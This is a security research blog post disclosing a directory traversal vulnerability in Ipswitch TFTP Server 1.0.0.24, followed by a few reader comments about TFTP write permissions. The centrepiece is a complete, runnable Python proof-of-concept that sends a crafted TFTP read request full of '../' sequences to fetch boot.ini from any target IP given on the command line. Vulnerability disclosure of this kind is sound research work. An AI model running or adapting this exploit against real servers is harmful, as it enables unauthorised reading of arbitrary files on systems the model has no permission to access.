Ipswitch TFTP Server Directory Traversal Vulnerability

  • Post author:
  • Reading time:2 mins read

SecPod Research Team member (Prabhu S Angadi) has found a Directory Traversal vulnerability in Ipswitch TFTP Server. The vulnerability is caused due to improper validation of ‘Read’ request containing ‘../’ sequences. The flaw can be exploited to read arbitrary files via directory traversal attacks.

POC : Download here.

More information on the flaws can be found here.

#!/usr/bin/python
##############################################################################
# Title     : Ipswitch TFTP Server Directory Traversal Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.whatsupgold.com/index.aspx
# Advisory  : https://www.secpod.com/blog/?p=424
#             http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt
#             http://secpod.org/exploits/SecPod_Ipswitch_TFTP_Server_Dir_Trav_POC.py
# Version   : Ipswitch TFTP Server 1.0.0.24
# Date      : 02/12/2011
##############################################################################

import sys, socket

def sendPacket(HOST, PORT, data):
    '''
    Sends UDP Data to a Particular Host on a Specified Port
    with a Given Data and Return the Response
    '''

    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.sendto(data, (HOST, PORT))
    data = udp_sock.recv(1024)
    udp_sock.close()

    return data

if __name__ == "__main__":

    if len(sys.argv) < 2:
        print '\tUsage: python exploit.py target_ip'
        print '\tExample : python exploit.py 127.0.0.1'
        print '\tExiting...'
        sys.exit(0)

    HOST = sys.argv[1]                               ## The Server IP
    PORT = 69                                        ## Default TFTP port

    data = "\x00\x01"                                ## TFTP Read Request
    data += "../" * 10 + "boot.ini" + "\x00"         ## Read boot.ini file using directory traversal
    data += "netascii\x00"                           ## TFTP Type

    ## netascii
    rec_data = sendPacket(HOST, PORT, data)
    print "Data Found on the target : %s " %(HOST)
    print rec_data.strip()

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Tags: , , ,

This Post Has 4 Comments

  1. Jay December 4, 2011

    Does the TFTP service allow WRITE request at all? It throws you a “Forbidden due to security rules” when you try, but I wonder that “rule” can be changed.

  2. Veerendra GG December 5, 2011

    TFTP should all WRITE request. It’s about configuration/permission, which stops you from using WRITE request.

  3. Stan November 16, 2013

    Veerendra GG,
    What configuration/permission to wich you are referring?

    Thanks in advance for your kind response

  4. Veerendra GG November 19, 2013

    Stan,

    Referring to TFTP configuration/permission.
    i.e we can configure TFTP to allow write request or not depending on the requirements.

Comments are closed.